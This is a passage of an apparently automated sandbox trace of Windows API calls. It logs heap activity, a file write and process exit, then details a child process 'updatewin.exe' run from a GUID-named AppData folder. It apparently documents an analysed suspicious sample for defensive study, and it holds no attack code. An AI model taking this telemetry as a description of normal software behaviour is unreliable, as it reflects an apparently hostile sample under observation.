Size=0x4a5) returned 0x5d07c8 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d04a0 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6f7) returned 0x5d0c78 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d07c8 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa72) returned 0x5d0110 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d0c78 | out: hHeap=0x5a0000) returned 1 [0078.996] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xfaa) returned 0x5d2e00 [0078.996] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d0110 | out: hHeap=0x5a0000) returned 1 [0078.996] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x17a1) returned 0x5d6bd0 [0078.996] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2e00 | out: hHeap=0x5a0000) returned 1 [0078.996] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x235f) returned 0x5d8380 [0078.996] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6bd0 | out: hHeap=0x5a0000) returned 1 [0078.996] WriteFile (in: hFile=0xa0, lpBuffer=0x5d83a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x5d83a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0078.997] CloseHandle (hObject=0xa0) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8380 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc118 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc140 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc168 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc190 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc1b8 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc1e0 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc208 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc230 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc258 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc280 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc2a8 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc2d0 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc2f8 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc320 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc348 | out: hHeap=0x5a0000) returned 1 [0078.999] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc370 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc398 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc3c0 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc3e8 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc410 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc438 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1618 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1640 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1668 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1690 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d16b8 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d16e0 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1708 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1730 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1758 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1780 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d17a8 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d17d0 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d17f8 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1820 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1848 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1870 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1898 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d18c0 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d18e8 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1910 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1938 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1960 | out: hHeap=0x5a0000) returned 1 [0079.000] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1988 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d19b0 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d19d8 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1a00 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1a28 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1a50 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1a78 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1aa0 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1ac8 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1af0 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1b18 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1b40 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1b68 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1b90 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1bb8 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1be0 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1c08 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1c30 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1c58 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1c80 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1ca8 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1cd0 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1cf8 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1d20 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1d48 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1d70 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1d98 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1dc0 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1e18 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1e40 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1e68 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1e90 | out: hHeap=0x5a0000) returned 1 [0079.001] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1eb8 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1ee0 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1f08 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1f30 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1f58 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1f80 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1fa8 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1fd0 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1ff8 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2020 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2048 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2070 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2098 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d20c0 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d20e8 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5490 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2110 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2138 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2160 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2188 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d21b0 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d21d8 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2200 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2228 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2250 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2278 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d22a0 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d22c8 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d22f0 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2318 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2340 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2368 | out: hHeap=0x5a0000) returned 1 [0079.002] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2390 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d23b8 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d23e0 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2408 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2430 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2458 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2480 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d24a8 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d24d0 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d24f8 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2520 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2548 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2570 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2598 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d25c0 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2618 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2640 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2668 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2690 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d26b8 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d26e0 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2708 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2730 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2758 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2780 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d27a8 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d27d0 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d27f8 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2820 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2848 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2870 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2898 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d28c0 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d28e8 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2910 | out: hHeap=0x5a0000) returned 1 [0079.003] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2938 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2960 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2988 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d29b0 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d29d8 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2a00 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2a28 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2a50 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2a78 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2aa0 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d4e00 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ceaf8 | out: hHeap=0x5a0000) returned 1 [0079.004] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0079.004] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ca3e8 | out: hHeap=0x5a0000) returned 1 [0079.004] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ccdc8 | out: hHeap=0x5a0000) returned 1 [0079.004] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0079.005] GetLastError () returned 0x57 [0079.005] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0079.005] ExitProcess (uExitCode=0x0) [0079.005] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cad00 | out: hHeap=0x5a0000) returned 1 [0079.005] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "8" image_name = "updatewin.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe" page_root = "0x316ce000" os_pid = "0x934" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x7f0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 49 os_tid = 0x944 [0077.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9d5de760, dwHighDateTime=0x1d5d6b4)) [0077.526] GetCurrentProcessId () returned 0x934 [0077.526] GetCurrentThreadId () returned 0x944 [0077.526] GetTickCount () returned 0x11599ef [0077.526] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=21881441979) returned 1 [0077.541] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0077.541] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x260000 [0077.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.549] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0077.549] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0077.549] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0077.549] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0077.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.549] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.550] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.550] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.551] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.551] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.551] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.552] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.553] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0077.553] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x214) returned 0x2607d0 [0077.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.554] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0077.554] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.554] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.554] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0077.554] GetCurrentThreadId () returned 0x944 [0077.554] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0077.554] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2609f0 [0077.555] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0077.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0077.555] 